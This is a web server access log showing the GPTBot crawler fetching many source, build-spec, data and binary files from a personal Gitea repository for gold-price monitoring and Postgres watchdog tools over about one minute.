"/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assets_data.csv?display=source" [Client 74.7.227.38] [Length 11410] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assets_data.csv" +[17/Feb/2026:17:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.0.py?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:17:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1.py?display=source" [Client 74.7.227.38] [Length 20858] [Gzip 6.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:17:26:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17365] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:26:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/my_database.db" +[17/Feb/2026:17:26:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1.py?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:17:26:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe?display=rendered" [Client 74.7.227.38] [Length 10819] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe" +[17/Feb/2026:17:26:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libiconv-2.dll?display=rendered" [Client 74.7.227.38] [Length 10858] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libiconv-2.dll" +[17/Feb/2026:17:26:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/user_assets.csv?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/user_assets.csv" +[17/Feb/2026:17:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/notifier.py?display=source" [Client 74.7.227.38] [Length 18090] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/notifier.py" +[17/Feb/2026:17:26:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/my_database.db" +[17/Feb/2026:17:26:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.spec?display=source" [Client 74.7.227.38] [Length 12373] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:17:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assets_data.csv?display=source" [Client 74.7.227.38] [Length 11381] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assets_data.csv" +[17/Feb/2026:17:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V4.8.py?display=rendered" [Client 74.7.227.38] [Length 10929] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:17:26:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.9.spec?display=source" [Client 74.7.227.38] [Length 12379] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:17:26:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.8.spec?display=source" [Client 74.7.227.38] [Length 12379] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:17:26:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.py?display=source" [Client 74.7.227.38] [Length 20778] [Gzip 6.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:17:26:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.spec?display=rendered" [Client 74.7.227.38] [Length 10886] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:17:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v5.1.spec?display=source" [Client 74.7.227.38] [Length 12391] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:17:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.spec?display=source" [Client 74.7.227.38] [Length 12388] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:17:26:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.spec?display=source" [Client 74.7.227.38] [Length 12291] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:17:26:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_KRX.py?display=rendered" [Client 74.7.227.38] [Length 10895] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:17:26:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1.py?display=source" [Client 74.7.227.38] [Length 20889] [Gzip 6.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:17:26:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py.old?display=source" [Client 74.7.227.38] [Length 16610] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:17:26:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py.old?display=source" [Client 74.7.227.38] [Length 16609] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:17:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.py?display=source" [Client 74.7.227.38] [Length 18605] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:17:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1.py?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:17:26:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/Old_GoldMonitor.py?display=source" [Client 74.7.227.38] [Length 14469] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:17:26:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10877] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/my_database.db" +[17/Feb/2026:17:26:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/calculator.py?display=source" [Client 74.7.227.38] [Length 12854] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/calculator.py" +[17/Feb/2026:17:26:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_Final.spec?display=source" [Client 74.7.227.38] [Length 12537] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:17:26:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build_exe.py?display=rendered" [Client 74.7.227.38] [Length 10879] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build_exe.py" +[17/Feb/2026:17:26:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V4.8.py?display=source" [Client 74.7.227.38] [Length 17987] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:17:26:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.spec?display=source" [Client 74.7.227.38] [Length 12414] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:17:26:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py.old?display=source" [Client 74.7.227.38] [Length 16577] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:17:26:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10875] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/my_database.db" +[17/Feb/2026:17:26:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17363] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:26:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V4.8.py?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:17:26:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libmodbus-5.dll?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libmodbus-5.dll" +[17/Feb/2026:17:26:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.py?display=source" [Client 74.7.227.38] [Length 29285] [Gzip 8.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.py" +[17/Feb/2026:17:26:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/my_database.db" +[17/Feb/2026:17:26:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.py?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.py" +[17/Feb/2026:17:26:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libiconv-2.dll?display=rendered" [Client 74.7.227.38] [Length 10857] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libiconv-2.dll" +[17/Feb/2026:17:26:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_price_log.csv?display=source" [Client 74.7.227.38] [Length 11223] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:17:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libmodbus-5.dll?display=rendered" [Client 74.7.227.38] [Length 10835] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libmodbus-5.dll" +[17/Feb/2026:17:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/user_assets.csv?display=rendered" [Client 74.7.227.38] [Length 11115] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/user_assets.csv" +[17/Feb/2026:17:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.spec?display=source" [Client 74.7.227.38] [Length 12278] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:17:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.log?display=rendered" [Client 74.7.227.38] [Length 10883] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.log" +[17/Feb/2026:17:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21435] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_KRX.py?display=source" [Client 74.7.227.38] [Length 17575] [Gzip 5.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:17:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr 